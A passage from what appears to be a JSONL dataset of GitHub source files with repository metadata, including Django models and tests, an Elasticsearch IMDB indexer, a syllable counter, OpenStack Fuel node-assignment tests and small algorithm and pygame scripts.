https://soundcloud.com/username\ndef soundcloud_fetch_metadata(artist):\n url = '{0}/{1}'.format(settings.SOUNDCLOUD_FRONT_URL, artist)\n safe_artist = utils.safe_filename(artist)\n api = settings.SOUNDCLOUD_RESOLVE_API.format(url, settings.SOUNDCLOUD_CLIENT_ID)\n metadata = utils.tree()\n\n resolver = requests.get(api)\n print(\"Resolver: {}\".format(resolver))\n\n tracks = []\n try:\n user = resolver.json()['username']\n user_id = resolver.json()['id']\n track_count = int(resolver.json()['track_count'])\n track_api = settings.SOUNDCLOUD_TRACK_API.format(user_id, settings.SOUNDCLOUD_CLIENT_ID)\n tracks = requests.get(track_api).json()\n print(\"Got tracks...{}\".format(tracks))\n except:\n pass\n\n track_number = 0\n for track in tracks:\n track_number = track_number + 1\n try:\n waveform_url = track['waveform_url']\n regex = re.compile(\"\\/([a-zA-Z0-9]+)_\")\n r = regex.search(waveform_url)\n stream_id = r.groups()[0]\n\n metadata[artist]['tracks'][track['title']]['url'] = settings.SOUNDCLOUD_MEDIA_URL.format(stream_id)\n metadata[artist]['tracks'][track['title']]['album'] = ''\n metadata[artist]['tracks'][track['title']]['encoding'] = 'mp3'\n metadata[artist]['tracks'][track['title']]['duration'] = None\n metadata[artist]['tracks'][track['title']]['track_number'] = track_number\n metadata[artist]['tracks'][track['title']]['license'] = 'unknown'\n track_filename = track['track_num'] + '-' if 'track_num' in track else ''\n track_filename = track_filename + utils.safe_filename(track['title']) + '.mp3'\n metadata[artist]['tracks'][track['title']]['track_filename'] = track_filename\n track_folder = \"{0}/{1}\".format(\n settings.MEDIA_FOLDER, safe_artist)\n metadata[artist]['tracks'][track['title']]['track_folder'] = track_folder\n\n except:\n pass\n\n return metadata\n","repo_name":"ajduncan/downspout","sub_path":"downspout/soundcloud.py","file_name":"soundcloud.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16246524591","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def bstFromPreorder(self, preorder: List[int]) -> Optional[TreeNode]:\n root = TreeNode(preorder[0])\n stack = [root]\n \n for i in range(1, len(preorder)):\n cur = TreeNode(preorder[i])\n if cur.val < stack[-1].val:\n stack[-1].left = cur\n \n else:\n prev = None\n while stack:\n prev = stack.pop()\n \n if stack and stack[-1].val > cur.val:\n break\n \n prev.right = cur\n \n stack.append(cur)\n \n return root","repo_name":"AmanuelD02/Competitive-Programming","sub_path":"1008-construct-binary-search-tree-from-preorder-traversal/1008-construct-binary-search-tree-from-preorder-traversal.py","file_name":"1008-construct-binary-search-tree-from-preorder-traversal.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43473814365","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\nfrom django.contrib.auth import get_user_model\nfrom django.conf import settings\n\nfrom django.contrib.postgres.fields import JSONField\n\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\nclass Timestamp(models.Model):\n\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __unicode__(self):\n return self.name\n\n class Meta:\n abstract = True\n\n\nclass Profile(Timestamp):\n\n USER_GENDER_CHOICES = (\n (\"None\", \"None selected\"),\n (\"Male\", \"Male\"),\n (\"Female\", \"Female\"),\n (\"Not_of_this_earth\", \"Not of this Earth\"),\n (\"Nunna_yo_biznizz\", \"Nunna yo biznizz!\"),\n )\n\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n primary_key=True,\n )\n fb_id = models.CharField(max_length=255, blank=True)\n profile_pic = models.CharField(max_length=255, blank=True)\n locale = models.CharField(max_length=48, blank=True)\n timezone = models.IntegerField(default='+8')\n location = models.CharField(max_length=255, blank=True)\n slug = models.SlugField(max_length=255, blank=True)\n score = models.IntegerField(default=0)\n bio = models.CharField(max_length=255, blank=True)\n email_confirmed = models.BooleanField(default=False)\n private = models.BooleanField(default=False)\n gender = models.CharField(\n max_length=128,\n blank=True,\n default='None',\n choices=USER_GENDER_CHOICES,\n )\n\n class Meta:\n managed = False\n db_table = 'common_profile'\n\n\n@receiver(post_save, sender=User)\ndef update_user_profile(sender, instance, created, **kwargs):\n print(\"POST SAVE\", sender, instance, created)\n print(\"POST SAVE KWARGS\", kwargs)\n if created:\n profile = Profile.objects.create(user=instance)\n profile.save()\n\n\nclass CelebModel(Timestamp):\n name = models.CharField(max_length=255)\n profile = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n related_name='linked_profile'\n )\n ig_handle = models.CharField(max_length=255, blank=True)\n slug = models.SlugField(max_length=255, blank=True)\n link = models.CharField(max_length=255, blank=True)\n followers = models.IntegerField(default=0)\n profile_pic = models.CharField(max_length=255, blank=True)\n score = models.IntegerField(default=0)\n tag_list = JSONField(blank=True, null=True)\n interests_list = JSONField(blank=True, null=True)\n concepts_list = JSONField(blank=True, null=True)\n word_set = JSONField(blank=True, null=True)\n last_scraped = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'influencers_celebrity'\n","repo_name":"MichaelLisboa/instagram-drf-python-social_auth-react","sub_path":"backend/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"21615939607","text":"import torch\nimport pandas as pd\n\ndef detec_son(path_imagen):\n model = torch.hub.load('ultralytics/yolov5', 'custom', path='.\\\\src\\\\pesos\\\\best.pt', force_reload=True) \n # Image\\\n img = path_imagen\n # Inference\n model.conf = 0.6\n results = model(img)\n # Results, change the flowing to: results.show()\n results.save()\n print(results) # or .show(), .save(), .crop(), .pandas(), etc\n #results.pandas()\n indicador=1\n return","repo_name":"JuanEncizo/Landing_Page","sub_path":"src/app_detect.py","file_name":"app_detect.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34615972458","text":"from datetime import datetime\n\nfrom django.test import TestCase\nfrom django.urls.base import reverse\nfrom django.utils import timezone\n\nfrom .models import Feed\n\n\nclass RssTests(TestCase):\n def setUp(self):\n self.feed = Feed.objects.create(\n name=\"Lobsters\",\n title=\"ZFS Woes, or how ZFS Saved Me From Data Corruption\",\n description=\"so much to tell\",\n link=\"https://battlepenguin.com/tech/zfs-woes-or-how-zfs-saved-me-from-data-corruption\",\n pub_date=timezone.now(),\n image=\"https://image.myawesomeshow.com\",\n )\n\n def test_feed_content(self):\n self.assertEqual(self.feed.name, \"Lobsters\")\n self.assertEqual(self.feed.title, \"ZFS Woes, or how ZFS Saved Me From Data Corruption\")\n self.assertEqual(self.feed.description, \"so much to tell\")\n self.assertEqual(\n self.feed.link, \"https://battlepenguin.com/tech/zfs-woes-or-how-zfs-saved-me-from-data-corruption\"\n )\n self.assertEqual(self.feed.image, \"https://image.myawesomeshow.com\")\n\n def test_episode_str_representation(self):\n self.assertEqual(str(self.feed), \"Lobsters: ZFS Woes, or how ZFS Saved Me From Data Corruption\")\n\n def test_home_page_status_code(self):\n response = self.client.get(\"/\")\n self.assertEqual(response.status_code, 200)\n\n def test_home_page_uses_correct_template(self):\n response = self.client.get(reverse(\"homepage\"))\n self.assertTemplateUsed(response, \"homepage.html\")\n\n def test_homepage_list_contents(self):\n response = self.client.get(reverse(\"homepage\"))\n self.assertContains(\n response,\n \"ZFS Woes, or how ZFS Saved Me From Data Corruption\",\n )\n","repo_name":"miccaldas/old_alternative_projects","sub_path":"django/django_rss/rss/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17109234657","text":"import pytest\n\nfrom searching import search\n\nclass Test_binary:\n @pytest.mark.parametrize('searchlist,item,expected', [([1,3,5,6,7],3,1),([3,4,16,23,40],40,4),([9,10,11,12,13,14],15,-1)])\n def test_binary_finds_unique_element_in_sorted_list(self,searchlist,item,expected):\n i = search.binary(searchlist,item)\n assert i == expected\n\nclass Test_linear:\n @pytest.mark.parametrize('searchlist,item,find,expected', [([1,3,5,6,7],3,'first',1),([3,4,16,23,40],40,'first',4),([9,10,11,12,13,14],15,'first',-1)])\n def test_linear_finds_element_in_sorted_list(self,searchlist,item,find,expected):\n i = search.linear(searchlist,item,find)\n assert i == expected","repo_name":"wolfnfox/Code-Snippets","sub_path":"Python Snippets/tests/searching_tests/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71091682649","text":"\nimport ddbutils\nimport httputils\nimport datautils\n\n\n# 端末名登録\ndef main(event, context):\n print('event:', event)\n queryStringParameters = event.get('queryStringParameters')\n if queryStringParameters is None:\n return httputils.return400()\n terminal_id = queryStringParameters.get('terminal_id', 'anonymous')\n app_id = queryStringParameters.get('app_id', 'anonymous')\n name = queryStringParameters.get('name', 'anonymous')\n if app_id == 'vrc':\n # プレフィクスとしてIPアドレスを付与\n terminal_id = event.get('requestContext').get('identity').get('sourceIp') + '_' + terminal_id\n else:\n # VRC以外はダメ、いまのところ\n return httputils.return400()\n # 登録されているか\n terminal = ddbutils.get_terminal(terminal_id)\n if terminal is None:\n # 端末が登録されて無い場合は登録\n print('regist_terminal', terminal_id, name)\n ddbutils.regist_terminal(terminal_id, ddbutils.makeTTLdays(24), name, datautils.STATUS_STANDBY)\n else:\n # 端末が登録されている場合は更新\n print('update_terminal_name', terminal_id, name)\n ddbutils.update_terminal_name(terminal_id, name)\n return httputils.return200()\n","repo_name":"aki-lua87/rv_vs_server","sub_path":"src/lambda/rv_terminal_regist/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6080780561","text":"import yaml\n\nfrom oslo_serialization import jsonutils\n\nfrom nailgun.db.sqlalchemy.models import NodeBondInterface\n\nfrom nailgun.test.base import BaseIntegrationTest\nfrom nailgun.utils import reverse\n\n\nclass TestAssignmentHandlers(BaseIntegrationTest):\n def _assign_roles(self, assignment_data, expect_errors=False):\n return self.app.post(\n reverse(\n 'NodeAssignmentHandler',\n kwargs={'cluster_id': self.cluster.id}\n ),\n jsonutils.dumps(assignment_data),\n headers=self.default_headers,\n expect_errors=expect_errors\n )\n\n def test_assignment(self):\n self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[\n {\n \"cluster_id\": None,\n \"api\": True\n }\n ]\n )\n self.cluster = self.env.clusters[0]\n node = self.env.nodes[0]\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller']\n }\n ]\n resp = self._assign_roles(assignment_data)\n self.assertEqual(200, resp.status_code)\n self.assertEqual(node.cluster, self.cluster)\n self.datadiff(\n node.pending_roles,\n assignment_data[0][\"roles\"]\n )\n\n resp = self._assign_roles(assignment_data, True)\n self.assertEqual(400, resp.status_code)\n\n def test_unassignment(self):\n cluster = self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[{}]\n )\n node = self.env.nodes[0]\n # correct unassignment\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers\n )\n self.assertEqual(200, resp.status_code)\n self.assertEqual(node.cluster, None)\n self.assertEqual(node.pending_roles, [])\n\n #Test with invalid node ids\n for node_id in (0, node.id + 50):\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node_id}]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(400, resp.status_code)\n #Test with invalid cluster id\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id'] + 5}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(resp.status_code, 404)\n\n # Test with wrong cluster id\n self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[{}]\n )\n\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': self.env.clusters[1].nodes[0].id}]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEqual(resp.status_code, 400)\n\n def test_unassignment_after_deploy(self):\n cluster = self.env.create(\n nodes_kwargs=[{}]\n )\n node = self.env.nodes[0]\n node.status = 'error'\n self.db.commit()\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers\n )\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(node.pending_deletion, True)\n\n def test_assigment_with_invalid_cluster(self):\n node = self.env.create_node(api=False)\n\n resp = self.app.post(\n reverse(\n 'NodeAssignmentHandler',\n kwargs={'cluster_id': '9999'}\n ),\n jsonutils.dumps([{\n 'id': node.id,\n 'roles': ['controller']\n }]),\n headers=self.default_headers,\n expect_errors=True\n )\n self.assertEquals(404, resp.status_code)\n\n def test_assign_conflicting_roles(self):\n self.env.create(\n cluster_kwargs={\"api\": True},\n nodes_kwargs=[\n {\n \"cluster_id\": None,\n \"api\": True\n }\n ]\n )\n self.cluster = self.env.clusters[0]\n node = self.env.nodes[0]\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller', 'compute']\n }\n ]\n resp = self._assign_roles(assignment_data, True)\n self.assertEquals(400, resp.status_code)\n\n def test_assign_conflicting_all_role(self):\n ROLE = yaml.safe_load(\"\"\"\n name: test_role\n meta:\n name: \"Some plugin role\"\n description: \"Some description\"\n conflicts: \"*\"\n volumes_roles_mapping:\n - id: os\n allocate_size: all\n \"\"\")\n\n release = self.env.create_release()\n resp = self.env.create_role(release.id, ROLE)\n\n self.env.create(\n cluster_kwargs={\n \"api\": True,\n \"release_id\": release.id\n },\n nodes_kwargs=[\n {\n \"cluster_id\": None,\n \"api\": True\n }\n ]\n )\n self.cluster = self.env.clusters[0]\n node = self.env.nodes[0]\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller', 'test_role']\n }\n ]\n resp = self._assign_roles(assignment_data, True)\n self.assertEquals(400, resp.status_code, resp.body)\n\n assignment_data[0][\"roles\"] = ['test_role']\n resp = self._assign_roles(assignment_data)\n self.assertEquals(200, resp.status_code, resp.body)\n\n def test_add_node_with_cluster_network_template(self):\n net_template = {\n \"adv_net_template\": {\n \"default\": {\n \"network_assignments\": {\n \"management\": {\n \"ep\": \"br-mgmt\"\n },\n \"storage\": {\n \"ep\": \"br-storage\"\n },\n \"public\": {\n \"ep\": \"br-ex\"\n },\n \"private\": {\n \"ep\": \"br-prv\"\n },\n \"fuelweb_admin\": {\n \"ep\": \"br-fw-admin\"\n }\n },\n \"templates_for_node_role\": {\n \"controller\": [\n \"common\"\n ]\n },\n \"nic_mapping\": {\n \"default\": {\n \"if4\": \"eth3\",\n \"if1\": \"eth0\",\n \"if2\": \"eth1\",\n \"if3\": \"eth2\"\n }\n },\n \"network_scheme\": {\n \"common\": {\n \"endpoints\": [\n \"br-mgmt\"\n ],\n \"transformations\": [\n {\n \"action\": \"add-br\",\n \"name\": \"br-mgmt\"\n },\n {\n \"action\": \"add-port\",\n \"bridge\": \"br-mgmt\",\n \"name\": \"<% if2 %>\"\n }\n ],\n \"roles\": {\n \"management\": \"br-mgmt\"\n }\n }\n }\n }\n }\n }\n\n cluster = self.env.create_cluster(api=False)\n cluster.network_config.configuration_template = net_template\n\n node = self.env.create_node()\n assignment_data = [\n {\n \"id\": node.id,\n \"roles\": ['controller']\n }\n ]\n self.app.post(\n reverse(\n 'NodeAssignmentHandler',\n kwargs={'cluster_id': cluster.id}\n ),\n jsonutils.dumps(assignment_data),\n headers=self.default_headers\n )\n net_scheme = node.network_template['templates']['common']\n self.assertNotEqual({}, node.network_template)\n self.assertEquals(['br-mgmt'], net_scheme['endpoints'])\n self.assertEquals({'management': 'br-mgmt'}, net_scheme['roles'])\n\n # The order of transformations matters\n self.assertIn('add-br', net_scheme['transformations'][0].values())\n self.assertIn('add-port', net_scheme['transformations'][1].values())\n self.assertEquals('eth1', net_scheme['transformations'][1]['name'])\n\n\nclass TestClusterStateUnassignment(BaseIntegrationTest):\n\n def test_delete_bond_and_networks_state_on_unassignment(self):\n \"\"\"Test verifies that\n 1. bond configuration will be deleted\n 2. network unassigned from node interfaces\n when node unnasigned from cluster\n \"\"\"\n cluster = self.env.create(\n nodes_kwargs=[{}]\n )\n node = self.env.nodes[0]\n node.bond_interfaces.append(\n NodeBondInterface(name='ovs-bond0',\n slaves=node.nic_interfaces))\n self.db.flush()\n resp = self.app.post(\n reverse(\n 'NodeUnassignmentHandler',\n kwargs={'cluster_id': cluster['id']}\n ),\n jsonutils.dumps([{'id': node.id}]),\n headers=self.default_headers\n )\n\n self.assertEqual(resp.status_code, 200)\n self.assertEqual(node.bond_interfaces, [])\n for interface in node.interfaces:\n self.assertEqual(interface.assigned_networks_list, [])\n","repo_name":"thomasgoirand/fuel-nailgun","sub_path":"nailgun/test/unit/test_node_assignment_handler.py","file_name":"test_node_assignment_handler.py","file_ext":"py","file_size_in_byte":10642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29431207370","text":"BLACK = bytes.fromhex(\"00 00 00\")\n\n_BAD_COLOR_VALUE_ERROR_MSG = (\"Colors are expected to be a bytes object of \"\n \"length three (3) specifing the r,g and b \"\n \"components of the color in that order\")\n_BAD_DURATION_VALUE_ERROR_MSG = (\"Duration is expected to be an unsigned \"\n \"integer\")\n_BAD_FLASHES_VALUE_ERROR_MSG = \"Flashes is expected to be an unsigned integer\"\n\nclass AbstractController:\n '''\n Define the interface for portal box display controllers\n\n PortalBox.py expects controllers to implement the interface exposed by\n AbstractController. Therefore concrete Controller classes, ones that\n interface with real hardware should subclass AbstractController\n '''\n\n def __init__(self, settings = {}):\n '''\n Use the optional settings to configure the display\n\n Caller will pass a dict (ConfigParser.SectionProxy) initialized from\n the 'display' section of the config file. A ValueError should be raised\n if a required key is missing though sane defaults should be used if\n possible so that settings is optional.\n '''\n self.is_sleeping = False\n\n\n def sleep_display(self):\n '''\n Start a display sleeping animation\n '''\n self.is_sleeping = True\n\n\n def wake_display(self):\n '''\n End a box sleeping animation\n '''\n self.is_sleeping = False\n\n\n def set_display_color(self, color = BLACK):\n '''\n Set the entire strip to specified color.\n @param (unsigned integer) color - the color to set defaults to LED's off\n '''\n if type(color) is not bytes or 3 != len(color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n\n\n def set_display_color_wipe(self, color, duration):\n '''\n Set the entire strip to specified color using a \"wipe\" effect.\n @param (unsigned integer) color - the color to set\n @param (int) duration - how long the effect is to take\n '''\n if type(color) is not bytes or 3 != len(color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n\n if type(duration) is not int or 0 > duration:\n raise ValueError(_BAD_DURATION_VALUE_ERROR_MSG)\n\n\n def flash_display(self, flash_color, duration, flashes=5, end_color = BLACK):\n \"\"\"Flash color across all display pixels multiple times.\"\"\"\n if type(flash_color) is not bytes or 3 != len(flash_color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n\n if type(duration) is not int or 0 > duration:\n raise ValueError(_BAD_DURATION_VALUE_ERROR_MSG)\n\n if type(flashes) is not int or 0 > flashes:\n raise ValueError(_BAD_FLASHES_VALUE_ERROR_MSG)\n\n if type(end_color) is not bytes or 3 != len(end_color):\n raise ValueError(_BAD_COLOR_VALUE_ERROR_MSG)\n","repo_name":"Bucknell-ECE/PortalBox-application","sub_path":"portalbox/display/AbstractController.py","file_name":"AbstractController.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9343511151","text":"\"\"\"\nFallback syllable counter\n\nThis is based on the algorithm in Greg Fast's perl module\nLingua::EN::Syllable.\n\"\"\"\n\nimport string, re, os\n\nspecialSyllables_en = \"\"\"tottered 2\nchummed 1\npeeped 1\nmoustaches 2\nshamefully 3\nmessieurs 2\nsatiated 4\nsailmaker 4\nsheered 1\ndisinterred 3\npropitiatory 6\nbepatched 2\nparticularized 5\ncaressed 2\ntrespassed 2\nsepulchre 3\nflapped 1\nhemispheres 3\npencilled 2\nmotioned 2\npoleman 2\nslandered 2\nsombre 2\netc 4\nsidespring 2\nmimes 1\neffaces 2\nmr 2\nmrs 2\nms 1\ndr 2\nst 1\nsr 2\njr 2\ntruckle 2\nfoamed 1\nfringed 2\nclattered 2\ncapered 2\nmangroves 2\nsuavely 2\nreclined 2\nbrutes 1\neffaced 2\nquivered 2\nh'm 1\nveriest 3\nsententiously 4\ndeafened 2\nmanoeuvred 3\nunstained 2\ngaped 1\nstammered 2\nshivered 2\ndiscoloured 3\ngravesend 2\n60 2\nlb 1\nunexpressed 3\ngreyish 2\nunostentatious 5\n\"\"\"\n\nfallback_cache = {}\n\nfallback_subsyl = [\"cial\", \"tia\", \"cius\", \"cious\", \"gui\", \"ion\", \"iou\",\n \"sia$\", \".ely$\"]\n\nfallback_addsyl = [\"ia\", \"riet\", \"dien\", \"iu\", \"io\", \"ii\",\n \"[aeiouy]bl$\", \"mbl$\",\n \"[aeiou]{3}\",\n \"^mc\", \"ism$\",\n \"(.)(?!\\\\1)([aeiouy])\\\\2l$\",\n \"[^l]llien\",\n \"^coad.\", \"^coag.\", \"^coal.\", \"^coax.\",\n \"(.)(?!\\\\1)[gq]ua(.)(?!\\\\2)[aeiou]\",\n \"dnt$\"]\n\n\n# Compile our regular expressions\nfor i in range(len(fallback_subsyl)):\n fallback_subsyl[i] = re.compile(fallback_subsyl[i])\nfor i in range(len(fallback_addsyl)):\n fallback_addsyl[i] = re.compile(fallback_addsyl[i])\n\ndef _normalize_word(word):\n return word.strip().lower()\n\n# Read our syllable override file and stash that info in the cache\nfor line in specialSyllables_en.splitlines():\n line = line.strip()\n if line:\n toks = line.split()\n assert len(toks) == 2\n fallback_cache[_normalize_word(toks[0])] = int(toks[1])\n\ndef count(word):\n word = _normalize_word(word)\n if not word:\n return 0\n\n # Check for a cached syllable count\n count = fallback_cache.get(word, -1)\n if count > 0:\n return count\n\n # Remove final silent 'e'\n if word[-1] == \"e\":\n word = word[:-1]\n\n # Count vowel groups\n count = 0\n prev_was_vowel = 0\n for c in word:\n is_vowel = c in (\"a\", \"e\", \"i\", \"o\", \"u\", \"y\")\n if is_vowel and not prev_was_vowel:\n count += 1\n prev_was_vowel = is_vowel\n\n # Add & subtract syllables\n for r in fallback_addsyl:\n if r.search(word):\n count += 1\n for r in fallback_subsyl:\n if r.search(word):\n count -= 1\n\n # Cache the syllable count\n fallback_cache[word] = count\n\n return count\n\n","repo_name":"mmautner/readability","sub_path":"syllables_en.py","file_name":"syllables_en.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"31"} +{"seq_id":"34509545304","text":"from __future__ import print_function\nfrom elasticsearch import Elasticsearch\nimport io\n\n\nclass Index:\n \"\"\"\n This class indexes files in a given path,passed as a parameter\n \"\"\"\n\n def __init__(self):\n self.client = None\n self.counter = 0\n self.client = Elasticsearch()\n self.lineElements =[]\n self.clustTitles = []\n self.clustGenres = []\n self.clustRanks = []\n self.titles = []\n self.clustSynopses =[]\n\n\n def implement(self):\n f = io.open('static/IMDB-Movie-Data.csv',encoding='utf8')\n lines = f.readlines()[1:]\n for line in lines:\n self.lineElements = line.split(',')\n self.clustTitles.append(self.lineElements[1].replace(\"\\n\",\"\").replace(\"\\n\",\"\"))\n self.clustSynopses.append(str(self.lineElements[3].replace(\"_\",\",\").replace(\"\\n\",\"\")))\n self.clustGenres.append(self.lineElements[2].replace(\"_\",\",\").replace(\"\\n\",\"\"))\n self.clustRanks.append(int(self.lineElements[0].replace(\"\\n\",\"\")))\n json = {\n\n \"Rank\": self.lineElements[0].replace(\"\\n\",\"\"),\n \"Title\": self.lineElements[1].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Genre\": self.lineElements[2].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Description\": self.lineElements[3].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Director\": self.lineElements[4].replace(\"\\n\",\"\"),\n \"Actors\": self.lineElements[5].replace(\"_\",\",\").replace(\"\\n\",\"\"),\n \"Year\": self.lineElements[6].replace(\"\\n\",\"\"),\n \"Runtime(Minutes)\": self.lineElements[7].replace(\"\\n\",\"\"),\n \"Rating\": self.lineElements[8].replace(\"\\n\",\"\"),\n \"Votes\": self.lineElements[9].replace(\"\\n\",\"\"),\n \"Revenue(Millions)\": self.lineElements[10].replace(\"\\n\",\"\"),\n \"Metascore\": self.lineElements[11].replace(\"\\n\",\"\"),\n \"ImageURL\":self.lineElements[12].replace(\"\\n\",\"\").replace(\"\\\"\",\"\")\n }\n\n self.client.index(index=\"imdb\", doc_type='movie', id=(int(self.lineElements[0])-1), body=json)\n f.close()\n\n def searchCategory(self,category):\n\n resultsDes = []\n res = self.client.search(index=\"imdb\", doc_type=\"movie\", body={\"query\": {\"match\": {\"Genre\": category}}})\n for doc in res['hits']['hits']:\n resultsDes.append(doc['_source'])\n return resultsDes\n\n def searchByQuery (self,userQuery):\n results= []\n resultsPlot = []\n res = self.client.search(index=\"imdb\", doc_type=\"movie\", body={\"query\": {\"multi_match\": {\"query\": userQuery, \"fields\":[ \"Title\", \"Description\" ]}}})\n print(\"%d documents found\" % res['hits']['total'])\n for doc in res['hits']['hits']:\n results.append(doc[\"_source\"]['Title'])\n resultsPlot.append(doc[\"_source\"]['Description'])\n return results, resultsPlot\n\n def searchByTitle (self,title):\n resultsDetails = []\n res = self.client.search(index=\"imdb\", doc_type=\"movie\", body={\"query\": {\"match\": {\"Title\": title}}})\n print(\"%d documents found\" % res['hits']['total'])\n for doc in res['hits']['hits']:\n resultsDetails.append(doc['_source'])\n return resultsDetails\n\n\n\n\n","repo_name":"sc14ag/epl660IMDB","sub_path":"EPL660/ElasticIndexing.py","file_name":"ElasticIndexing.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34984677225","text":"from django.forms import NullBooleanField\nfrom numpy import angle\nimport pygame\nimport math\n\n\n\nwidth, height = 640, 480\nwindow = pygame.display.set_mode((width, height))\nFPSCLOCK = pygame.time.Clock()\n\nWHITE = pygame.Color(\"white\")\n\nclass arm:\n def __init__(self, window, parent):\n self.startpoint = pygame.math.Vector2(320, 240)\n self.endpoint = pygame.math.Vector2(170, 0)\n self.color = pygame.Color('red')\n self.window = window\n self.angle = 0\n self.length = 100\n self.y = 0\n self.x = 0\n self.parent = parent\n self.func_type = ' '\n\n def getEndPosX(self):\n angle = self.angle\n parent = self.parent\n while(parent):\n angle += parent.angle\n parent = parent.parent\n return self.x + math.cos(angle) * self.length\n \n def getEndPosY(self):\n angle = self.angle\n parent = self.parent #arm1\n while(parent):\n angle += parent.angle\n parent = parent.parent\n return self.y + math.sin(angle) * self.length\n \n def connect(self, point1, point2):\n pygame.draw.line(self.window, self.color, point1, point2, width=4)\n \n def create(self, x, y, len):\n self.x = x\n self.y = y\n pygame.draw.line(self.window, self.color, (x, y), ((x+len),y), width=4)\n\n def update(self, angle, mag):\n self.angle = math.sin(angle) * mag\n self.connect(self.startpoint, (self.getEndPosX(),self.getEndPosY()))\n\n\n\nclass arm_segments(arm):\n def __init__(self, window, parent):\n arm.__init__(self, window, parent)\n\n def update(self, angle, mag, factor, func_type):\n parent = self.parent\n cords = parent.getEndPosX(), parent.getEndPosY()\n \n if func_type == 'cos':\n self.angle = math.cos(angle * factor) * mag\n elif func_type == 'sin':\n self.angle = math.sin(angle * factor) * mag\n else:\n print('Error: Input in argument incorrect...')\n\n self.connect(cords, (self.getEndPosX(),self.getEndPosY()))\n\n\ndef screen(window):\n window.fill(WHITE) \n\narm1 = arm(window, False)\narm2 = arm_segments(window, arm1)\narm3 = arm_segments(window, arm2)\n\ndef main():\n angle = 0\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n \n arm1.create(round(width/2), round(height/2), arm1.length)\n arm2.create(arm1.getEndPosX(), arm1.getEndPosY(), arm2.length)\n arm3.create(arm2.getEndPosX(), arm2.getEndPosY(), arm3.length)\n screen(window)\n arm1.update(angle, 1.2)\n arm2.update(angle, 0.93, 0.873, 'cos')\n arm3.update(angle, 1.34, 1.57, 'sin')\n angle += 0.05\n pygame.display.flip()\n FPSCLOCK.tick(45)\nmain()","repo_name":"andysit1/For-Fun-Stuff","sub_path":"kinematics/forward.kinev4.py","file_name":"forward.kinev4.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71481282648","text":"Book = []\n# Method for adding a new Book\ndef Push(Book):\n book = input (\"enter book name : \")\n Book.append(book)\n# method for deleting a book from the list\ndef Pop(Book):\n if (Book == []):\n print(\"stack empty !!\")\n else :\n print(\"Deleted book : \",Book.pop())\ndef Display(Book):\n if (Book == []):\n print(\"stack empty 